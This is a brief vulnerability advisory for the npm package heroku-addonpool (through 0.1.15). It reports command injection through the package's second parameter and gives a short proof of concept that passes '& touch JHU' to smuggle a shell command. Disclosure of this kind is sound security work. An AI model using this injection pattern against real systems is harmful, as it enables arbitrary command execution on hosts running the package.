heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function HerokuAddonPool(id, app, opt)
can be controlled by users without any sanitization.
PoC
var Root = require("heroku-addonpool");
var root = Root("sss", "& touch JHU", {});
root.setup();
CPE | Name | Operator | Version |
---|---|---|---|
heroku-addonpool | lt | 0.1.16 |